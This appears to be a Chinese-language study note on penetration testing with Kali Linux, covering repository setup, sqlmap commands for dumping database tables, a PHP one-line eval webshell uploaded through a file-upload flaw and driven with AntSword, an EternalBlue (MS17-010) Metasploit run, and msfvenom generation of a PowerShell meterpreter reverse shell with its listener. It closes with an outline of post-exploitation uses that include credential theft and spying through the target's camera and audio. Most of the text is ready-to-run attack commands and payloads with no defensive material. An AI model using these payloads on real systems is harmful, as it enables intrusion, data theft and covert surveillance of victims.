Kali Linux 渗透测试基础操作与漏洞利用笔记
一、环境准备与系统配置
1.1 环境
虚拟机平台:VMware
操作系统:Kali Linux(网络安全人员专用系统)
1.2 换源(更换为国内镜像源,提升下载速度)
sudo apt update
编辑源列表文件:
sudo nano /etc/apt/sources.list
将文件内容替换为国内镜像源(如阿里云、清华源等),例如:
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
保存并退出。
1.3 更新软件包
sudo apt update && sudo apt upgrade -y
1.4 设置中文语言环境
sudo dpkg-reconfigure locales
在界面中勾选
zh_CN.UTF-8(空格选中,Tab键切换到OK)将
zh_CN.UTF-8设置为默认语言
1.5 重启生效
sudo reboot
二、SQL注入漏洞利用(sqlmap)
2.1 概述
sqlmap:自动化SQL注入检测与利用工具,支持多种数据库(MySQL、Oracle等)。
2.2 基本命令流程
| 步骤 | 命令 | 说明 |
|---|---|---|
| 1 | sqlmap -u <目标URL> | 检测目标URL是否存在SQL注入漏洞 |
| 2 | sqlmap -u <目标URL> --dbs | 获取所有数据库名称 |
| 3 | sqlmap -u <目标URL> -D <数据库名> --tables | 获取指定数据库中的所有表名 |
| 4 | sqlmap -u <目标URL> -D <数据库名> -T <表名> --dump | 获取指定表中的所有数据(字段与记录) |
示例:
sqlmap -u "http://example.com/page?id=1" --dbs sqlmap -u "http://example.com/page?id=1" -D users_db --tables sqlmap -u "http://example.com/page?id=1" -D users_db -T admin --dump
三、任意文件上传漏洞利用
3.1 漏洞原理
网站未对上传文件进行严格验证,攻击者可上传恶意脚本(如WebShell)。
3.2 常用工具
WebShell木马:如一句话木马(PHP/ASP/JSP等)
中国蚁剑:一款开源的跨平台WebShell管理工具,用于连接并控制目标服务器。
3.3 基本利用步骤
制作木马(例如PHP一句话木马):
<?php @eval($_POST['pass']); ?>
上传木马:通过文件上传功能将木马上传到目标服务器。
连接木马:使用中国蚁剑,添加Shell地址(如
http://target.com/uploads/shell.php)和连接密码(如pass)。提权:获取Shell后,通过系统漏洞或配置错误提升权限(如从普通用户提至root/Administrator)。
四、永恒之蓝漏洞利用实例(MS17-010)
4.1 背景
漏洞编号:MS17-010
影响:2017年WannaCry勒索软件利用该漏洞在全球爆发。
靶机:Windows 7/2008等未打补丁的系统。
4.2 使用Metasploit(msf)进行渗透
启动msf控制台:
msfconsole
搜索相关漏洞模块:
search ms17-010
常用模块:
exploit/windows/smb/ms17_010_eternalblue使用模块:
use exploit/windows/smb/ms17_010_eternalblue
查看配置选项:
options
设置必要参数:
设置目标主机IP(rhosts):
set rhosts 192.168.xxx.xxx
设置本地监听IP(lhost,通常为攻击机IP):
set lhost 192.168.yyy.yyy
(可选)设置payload,如
windows/x64/meterpreter/reverse_tcp
执行攻击:
run
获取Shell后的简单操作:
若获得Meterpreter会话,可进入系统Shell:
shell
在Windows目标上弹出消息框:
msg * "你好"
打开计算器(测试命令执行):
calc
上传病毒upload,运行病毒execute -f
五、部署木马
5.1 使用 msfvenom 生成木马
Powershell 类型木马示例(反向 TCP):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.yyy.yyy LPORT=4444 -f psh-reflection -o shell.ps1
5.2 接收木马、监听连接(Metasploit Handler)
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set lhost 192.168.yyy.yyy(黑客IP) set lport 4444(端口) run
目标执行木马后,handler 会建立 Meterpreter 会话。
5.3 MSF 工具功能总结
一、MSF控制命令大全
二、权限提权与凭证获取(渗透核心)
三、文件系统操作(文件管理核心)
四、网络操作(内网渗透关键)
五、系统操作(控制目标主机)
六、用户界面监控(监控、控制目标桌面)
七、摄像头、音频(隐私窃取)
